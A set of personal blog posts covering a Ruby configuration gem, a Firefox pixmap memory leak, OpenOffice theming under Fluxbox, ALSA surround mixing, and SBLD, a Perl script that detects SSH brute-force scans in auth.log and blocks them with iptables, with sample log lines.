Overridable, self-documenting schemas for default values.

config.define(:address, :default => '1 North College St')
config.address # => '1 North College St'
config.address = 'Urnud'
config.address # => 'Urnud'

Straightforward YAML saving and loading.

config.to_yaml; Construct.load(yaml)

Define whatever methods you like on your config.

class Config < Construct
  def fooo
    foo + 'o'
  end
end

It's available as a gem:

gem install construct

A few minutes ago, I realized my disk was paging when I ran Vim. Took a quick look at gkrellm, and yes, in fact, I was almost out of swap space, and physical memory was maxed out. The culprit was Firefox, as usual; firefox-bin was responsible for roughly a gigabyte of X pixmap memory.

So I spent some time digging, and realized that I'd had a window open to the Nagios status map for a few hours, which includes a 992 x 1021 pixel PNG. The page refreshes every minute or so. So I closed Firefox, brought up xrestop, opened the status map again, and watched. Sure enough, X pixmap usage for Firefox jumped up by about 2500K per refresh. In the last 10 minutes or so, that number has ballooned to roughly 50MB.

What gets me is that this is the same image being loaded again and again. It's not just the back-page cache--it looks like Firefox is keeping every image it loads in X memory, and it never goes away: closing the tab, closing the window, clearing the cache... it looks like nothing short of ending the process frees those pixmaps. :-(

I run Fluxbox as my primary window manager, and use gnome-settings-daemon to keep gnome apps happy and GTK-informed. Thus far, all has gone well. However, OpenOffice.org does something very funky to determine whether one is using KDE or GTK, finds neither on my system, and drops back to the horribly ugly interface of 1997.

I haven't figured out how to fix this yet, but running gnome-session sets up something which convinces OpenOffice to use the GTK theme. It doesn't appear to be an environment variable, because I can set my environment identically under gnome and fluxbox, with no difference in OO behavior. My guess is there's some sort of socket or temporary file set by gnome-session, but it's all a mystery and the source is obfuscated. If anyone knows of a way to force OpenOffice 2.0 to use GTK, I'd be interested to hear about it.

I just realized that aside from simple copies, the ALSA route_policy duplicate will mix to arbitrary numbers of output channels AND that such a device can use a Dmix PCM device as its slave. This means that it's possible to take 2 channel CD audio and have it mixed to 5.1 channel surround, and still let other applications use the sound card. This makes XMMS very happy.

On the other hand, my onboard i810 sound card reverses the surround and center channels, and it does some funky mixing on the center channel for the subwoofer, which sounds really messed up when played on the rear speakers. I haven't figured out how to compensate for this yet.

A useful ALSA FAQ can be found here: http://alsa.opensrc.org/faq/.

I wrote a quick script to analyze the logs generated by SBLD. You can pull them out of syslog, or (as I'm doing), have your log checker aggregate SBLD events for you. I'm making the statistics for my site available here, as a resource for others.

If you run a server with SSHD exposed to the internet, chances are that server is being scanned for common username and password combinations. These often appear in the authorization log (/var/log/auth.log) as entries like:

Jun 12 13:33:57 localhost sshd[18900]: Illegal user admin from 219.254.25.100<br /> Jun 12 13:37:17 localhost sshd[18904]: Illegal user admin from 219.254.25.100<br /> Jun 12 13:37:20 localhost sshd[18906]: Illegal user test from 219.254.25.100<br /> Jun 12 13:37:22 localhost sshd[18908]: Illegal user guest from 219.254.25.100<br />

Extend that for several hundred lines, and you'll have an idea of what one scan looks like.

Being somewhat opposed to the idea of people clogging my logs with useless information, I wrote a small perl script to detect these entries in the log file and block the offending source address using iptables. It detects scans within a matter of seconds, and blocks the IP quickly to stop the attack. Blocks are only enabled for a short time--as little as 30 seconds is enough to discourage most automated scanners. SBLD limits the number of simultaneous bans to reduce iptables load and it's own resource usage, and gradually decreases the alert level for hosts when no attack is taking place.

With SBLD, the scan is quickly detected and ended.

Jun 17 13:31:58 localhost sshd[3314]: Illegal user test from 209.76.72.12<br /> Jun 17 13:31:59 localhost sshd[3316]: Illegal user test from 209.76.72.12<br /> Jun 17 13:32:00 localhost sshd[3322]: Illegal user tester from 209.76.72.12<br /> Jun 17 13:32:00 localhost sbld[3326]: Blocked 209.76.72.12<br /> Jun 17 13:32:30 localhost sbld[3326]: Unblocked 209.76.72.12<br />

The detection method itself is a simple regex applied to the log file, so it should be fairly easy to extend the daemon to block other kinds of attacks.

SBLD is still under development, but I'd like to encourage people to try it out and/or offer improvements. I make no guarantees as to the performance, safety, or security of this software. Contact me with feedback.

Files

Copyright © 2015 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.